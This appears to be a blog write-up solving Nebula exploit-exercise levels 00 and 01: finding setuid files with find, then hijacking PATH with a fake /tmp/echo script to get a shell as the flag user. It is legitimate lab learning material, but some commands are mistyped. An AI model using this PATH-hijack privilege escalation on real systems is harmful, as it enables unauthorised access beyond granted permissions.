Nebula-Exploit-Exercises-level01

This level deals with the Environmental variable “PATH”. By the code we understand that echo command is being executed in system. So let’s try modifying the environmental PATH.

level01@nebula:/home/flag01$export PATH=/tmp:$PATH

So in this it first looks in /tmp directory which we need. So here is main trick of the challenge. Let’s try make a symbolic link to /bin/bash with the dummy file in /tmp directory.

level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/echo

This didn’t work because “and” “now” “what?” are passed as arguments to the echo in system. So i thought of approaching in different way.

I wrote a shell script that will ignore arguments calls the “bash shell”.

level01@nebula:/home/flag01$ echo -e '/bin/bash' > /tmp/echo
level01@nebula:/home/flag01$ chmod +x echo

And executed the file and that worked.. 🙂

Nebula-Exploit-Exercises-level00

Few days back i have solved few challenges so i just thought of writing small description on solving these challenges. I solved these challenges by hosting the ISO file in my VM.

This level just requires you to find the setuid file that can done by using the
’find’ command. First we should find the file location that is done by

find / -perm /u=s -user flag00 2¿/dev/null

by seeing the permissions of the file flag00, it instead of just being executable

(-rwx-r-x—) it is suid (-rws-r-x—). Running the file will give you the shell.